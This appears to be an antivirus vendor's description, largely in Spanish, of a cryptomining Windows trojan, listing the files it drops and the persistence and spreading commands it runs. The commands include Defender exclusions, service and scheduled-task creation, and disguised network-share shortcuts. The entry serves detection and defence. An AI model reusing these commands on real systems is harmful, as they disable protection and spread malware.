Trojan.Win64.MALXMR.BRP

Instalación

Infiltra los archivos siguientes:

• %System%\svcldr64.dat
• %System%\console_zero.exe
• %System%\x470764.dat
• {Machine IP Address}\{Network Share Folder}\root\x{Random}.vbs
• {Machine IP Address}\{Network Share Folder}\root\x{Random}.dat
• {Machine IP Address}\{Network Share Folder}\root\rootcomp.dat
• {Machine IP Address}\{Network Share Folder}\{Network Share Folder}.lnk

(Nota: %System% es la carpeta del sistema de Windows, que en el caso de Windows 98 y ME suele estar en C:\Windows\System, en el caso de Windows NT y 2000 en C:\WINNT\System32 y en el caso de Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) y 10(64-bit) en C:\Windows\System32).

Agrega los procesos siguientes:

• cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32'"
• cmd.exe /c sc create x470764 binPath= %System%\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x470764\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "%System%\x470764.dat" /f && sc start x470764
• cmd.exe /c start "" "%System%\console_zero.exe"
• cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "%System%\console_zero.exe" /rl HIGHEST /f
• cmd.exe /c timeout /t 16 /nobreak && del /q "%System%\svcldr64.dat"
• cmd.exe /c arp -a
• cmd.exe /c powershell -Command "$WshShell = New-Object -comObject WScript.Shell; $Shortcut = $WshShell.CreateShortcut('\{Machine IP Address}\{Network Share Folder}\{Network Share Folder}.lnk'); $Shortcut.WorkingDirectory = '\{Machine IP Address}\{Network Share Folder}\rootdir'; $Shortcut.TargetPath = '\{Machine IP Address}\{Network Share Folder}\rootdir\x{Random}.vbs'; $Shortcut.IconLocation = '%System%\shell32.dll, 8'; $Shortcut.Save()"
• cmd.exe /c start "" "%System%\crypti.exe"

(Nota: %System% es la carpeta del sistema de Windows, que en el caso de Windows 98 y ME suele estar en C:\Windows\System, en el caso de Windows NT y 2000 en C:\WINNT\System32 y en el caso de Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) y 10(64-bit) en C:\Windows\System32).

Otros detalles

Hace lo siguiente:

• It adds the following service:
  • Name: x470764
  • Start Type: On Logon
  • Binary Path: %System%\console_zero.exe

(Nota: %System% es la carpeta del sistema de Windows, que en el caso de Windows 98 y ME suele estar en C:\Windows\System, en el caso de Windows NT y 2000 en C:\WINNT\System32 y en el caso de Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) y 10(64-bit) en C:\Windows\System32).